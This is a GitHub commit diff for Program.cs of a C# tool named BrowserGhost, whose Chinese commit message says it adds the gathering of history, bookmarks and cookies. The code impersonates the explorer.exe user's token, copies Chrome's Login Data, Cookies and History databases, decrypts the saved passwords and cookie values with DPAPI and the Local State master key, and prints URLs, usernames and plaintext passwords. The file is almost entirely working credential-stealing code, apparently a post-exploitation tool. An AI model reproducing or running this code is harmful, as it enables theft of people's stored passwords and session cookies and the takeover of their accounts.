Skip to content

Commit f1d0574

Browse files
n0thing0x01n0thing0x01
authored
Update Program.cs
添加获取 history 、books、cookie
1 parent be7bbdb commit f1d0574

File tree

1 file changed

+197
-63
lines changed

1 file changed

+197
-63
lines changed

Program.cs

Lines changed: 197 additions & 63 deletions
Original file line numberDiff line numberDiff line change
@@ -1,23 +1,16 @@
1-
using System;
1+
using System;
22
using System.Data;
3-
43
using System.Security.Cryptography;
54
using System.Text;
65
using System.Diagnostics;
7-
86
using System.IO;
9-
107
using CS_SQLite3;
11-
128
using System.Management;
13-
149
using System.Runtime.InteropServices;
1510

1611

1712

1813

19-
20-
2114
namespace BrowserGhost
2215
{
2316
class Program
@@ -308,6 +301,185 @@ public static string DecryptWithKey(byte[] encryptedData, byte[] MasterKey)
308301
}
309302
}
310303

304+
public static bool Chrome_history()
305+
{
306+
string chrome_History_path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Default\History";
307+
if (File.Exists(chrome_History_path) == true)
308+
{
309+
310+
string cookie_tempFile = Path.GetTempFileName();
311+
File.Copy(chrome_History_path, cookie_tempFile, true);
312+
313+
Console.WriteLine("\t[+] Copy {0} to {1}", chrome_History_path, cookie_tempFile);
314+
315+
SQLiteDatabase database = new SQLiteDatabase(cookie_tempFile);
316+
string query = "select url,title from urls";
317+
DataTable resultantQuery = database.ExecuteQuery(query);
318+
foreach (DataRow row in resultantQuery.Rows)
319+
{
320+
string url = (string)row["url"];
321+
string title = (string)row["title"];
322+
323+
Console.WriteLine("\t{0} \t {1}", url, title);
324+
325+
}
326+
database.CloseDatabase();
327+
System.IO.File.Delete(cookie_tempFile);
328+
Console.WriteLine("\t[+] Delete File {0}", cookie_tempFile);
329+
330+
}
331+
else
332+
{
333+
Console.WriteLine("[-] {0} Not Found!", chrome_History_path);
334+
}
335+
336+
return true;
337+
}
338+
339+
340+
341+
public static bool Chrome_cookies()
342+
{
343+
string chrome_cookie_path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Default\Cookies";
344+
if (File.Exists(chrome_cookie_path) == true)
345+
{
346+
string chrome_state_file = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Local State";
347+
string cookie_tempFile = Path.GetTempFileName();
348+
File.Copy(chrome_cookie_path, cookie_tempFile, true);
349+
350+
Console.WriteLine("\t[+] Copy {0} to {1}", chrome_cookie_path, cookie_tempFile);
351+
352+
SQLiteDatabase database = new SQLiteDatabase(cookie_tempFile);
353+
string query = "SELECT host_key, name,encrypted_value FROM cookies";
354+
DataTable resultantQuery = database.ExecuteQuery(query);
355+
foreach (DataRow row in resultantQuery.Rows)
356+
{
357+
string host_key = (string)row["host_key"];
358+
string name = (string)row["name"];
359+
byte[] cookieBytes = Convert.FromBase64String((string)row["encrypted_value"]);
360+
string cookie_value;
361+
try
362+
{
363+
//老版本解密
364+
cookie_value = Encoding.UTF8.GetString(ProtectedData.Unprotect(cookieBytes, null, DataProtectionScope.CurrentUser));
365+
366+
//Console.WriteLine("{0} {1} {2}", originUrl, username, password);
367+
}
368+
catch (Exception ex) //如果异常了就用新加密方式尝试
369+
{
370+
371+
byte[] masterKey = GetMasterKey(chrome_state_file);
372+
cookie_value = DecryptWithKey(cookieBytes, masterKey);
373+
374+
375+
}
376+
Console.WriteLine("\t[{0}] \t {1}={2}",host_key,name, cookie_value);
377+
378+
}
379+
database.CloseDatabase();
380+
System.IO.File.Delete(cookie_tempFile);
381+
Console.WriteLine("\t[+] Delete File {0}", cookie_tempFile);
382+
383+
}
384+
else
385+
{
386+
Console.WriteLine("[-] {0} Not Found!", chrome_cookie_path);
387+
}
388+
389+
return true;
390+
}
391+
392+
393+
//偷个懒 后面再解析json
394+
public static bool Chrome_books()
395+
{
396+
string chrome_book_path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Default\Bookmarks";
397+
if (File.Exists(chrome_book_path) == true)
398+
{
399+
400+
string booktext = File.ReadAllText(chrome_book_path);
401+
Console.WriteLine(booktext);
402+
403+
404+
}
405+
else
406+
{
407+
Console.WriteLine("[-] {0} Not Found!", chrome_book_path);
408+
}
409+
410+
return true;
411+
}
412+
public static bool Chrome_logins()
413+
{
414+
//copy login data
415+
string login_data_path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Default\Login Data";
416+
417+
if (File.Exists(login_data_path) == true)
418+
{
419+
string chrome_state_file = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Local State";
420+
string login_data_tempFile = Path.GetTempFileName();
421+
File.Copy(login_data_path, login_data_tempFile, true);
422+
423+
Console.WriteLine("\t[+] Copy {0} to {1}", login_data_path, login_data_tempFile);
424+
425+
SQLiteDatabase database = new SQLiteDatabase(login_data_tempFile);
426+
string query = "SELECT origin_url, username_value, password_value FROM logins";
427+
DataTable resultantQuery = database.ExecuteQuery(query);
428+
429+
foreach (DataRow row in resultantQuery.Rows)
430+
{
431+
string url;
432+
string username;
433+
try
434+
{
435+
url = (string)row["origin_url"];
436+
username = (string)row["username_value"];
437+
}
438+
catch
439+
{
440+
continue;
441+
}
442+
443+
444+
byte[] passwordBytes = Convert.FromBase64String((string)row["password_value"]);
445+
string password;
446+
try
447+
{
448+
//老版本解密
449+
password = Encoding.UTF8.GetString(ProtectedData.Unprotect(passwordBytes, null, DataProtectionScope.CurrentUser));
450+
451+
//Console.WriteLine("{0} {1} {2}", originUrl, username, password);
452+
}
453+
catch (Exception ex) //如果异常了就用新加密方式尝试
454+
{
455+
456+
byte[] masterKey = GetMasterKey(chrome_state_file);
457+
password = DecryptWithKey(passwordBytes, masterKey);
458+
459+
460+
}
461+
462+
463+
Console.WriteLine("\t[URL] -> {0}\n\t[USERNAME] -> {1}\n\t[PASSWORD] -> {2}\n", url, username, password);
464+
465+
466+
}
467+
database.CloseDatabase();
468+
System.IO.File.Delete(login_data_tempFile);
469+
Console.WriteLine("\t[+] Delete File {0}", login_data_tempFile);
470+
}
471+
else
472+
{
473+
Console.WriteLine("[-] {0} Not Found!", login_data_path);
474+
}
475+
476+
477+
478+
return false;
479+
}
480+
481+
482+
311483
static void Main(string[] args)
312484
{
313485

@@ -325,70 +497,32 @@ static void Main(string[] args)
325497
if (processname == "explorer")
326498
{
327499

328-
Console.WriteLine("[+] [{0}] [{1}] [{2}]", pid, processname, process_of_user);
500+
Console.WriteLine("[*] [{0}] [{1}] [{2}]", pid, processname, process_of_user);
329501

330502
ImpersonateProcessToken(pid);
331-
Console.WriteLine("[+] Impersonate user {0}", Environment.UserName);
332-
Console.WriteLine("[+] Current user {0}", Environment.UserName);
333-
503+
Console.WriteLine("[*] Impersonate user {0}", Environment.UserName);
504+
Console.WriteLine("[*] Current user {0}", Environment.UserName);
334505

335-
//copy login data
336-
string login_data_path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Default\Login Data";
337-
string chrome_state_file = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Local State";
338-
string login_data_tempFile = Path.GetTempFileName();
339-
File.Copy(login_data_path, login_data_tempFile, true);
506+
//密码
507+
Console.WriteLine("\n[*] Start Get Chrome Login Data");
508+
Chrome_logins();
340509

341-
Console.WriteLine("[+] Copy {0} to {1}", login_data_path, login_data_tempFile);
510+
//获取书签
511+
Console.WriteLine("\n[*] Start Get Chrome Bookmarks");
512+
Chrome_books();
342513

343-
SQLiteDatabase database = new SQLiteDatabase(login_data_tempFile);
344-
string query = "SELECT origin_url, username_value, password_value FROM logins";
345-
DataTable resultantQuery = database.ExecuteQuery(query);
514+
//cookie
515+
Console.WriteLine("\n[*] Start Get Chrome Cookie");
516+
Chrome_cookies();
346517

347-
foreach (DataRow row in resultantQuery.Rows)
348-
{
349-
string url;
350-
string username;
351-
try
352-
{
353-
url = (string)row["origin_url"];
354-
username = (string)row["username_value"];
355-
}
356-
catch
357-
{
358-
continue;
359-
}
360-
361-
362-
byte[] passwordBytes = Convert.FromBase64String((string)row["password_value"]);
363-
string password;
364-
try
365-
{
366-
//老版本解密
367-
password = Encoding.UTF8.GetString(ProtectedData.Unprotect(passwordBytes, null, DataProtectionScope.CurrentUser));
368-
369-
//Console.WriteLine("{0} {1} {2}", originUrl, username, password);
370-
}
371-
catch (Exception ex) //如果异常了就用新加密方式尝试
372-
{
373-
374-
byte[] masterKey = GetMasterKey(chrome_state_file);
375-
password = DecryptWithKey(passwordBytes, masterKey);
376-
377-
378-
}
379-
380-
381-
Console.WriteLine("\tURL -> {0}\n\tUSERNAME -> {1}\n\tPASSWORD -> {2}\n", url, username, password);
518+
Console.WriteLine("\n[*] Start Get Chrome History");
519+
Chrome_history();
382520

383-
}
384-
database.CloseDatabase();
385-
System.IO.File.Delete(login_data_tempFile);
386-
Console.WriteLine("[+] Delete File {0}", login_data_tempFile);
387521
//回退权限
388522
RevertToSelf();
389-
Console.WriteLine("[+] Recvtoself");
390-
Console.WriteLine("[+] Current user {0}", Environment.UserName);
391-
break;
523+
Console.WriteLine("[*] Recvtoself");
524+
Console.WriteLine("[*] Current user {0}", Environment.UserName);
525+
392526

393527
}
394528

0 commit comments

Comments
 (0)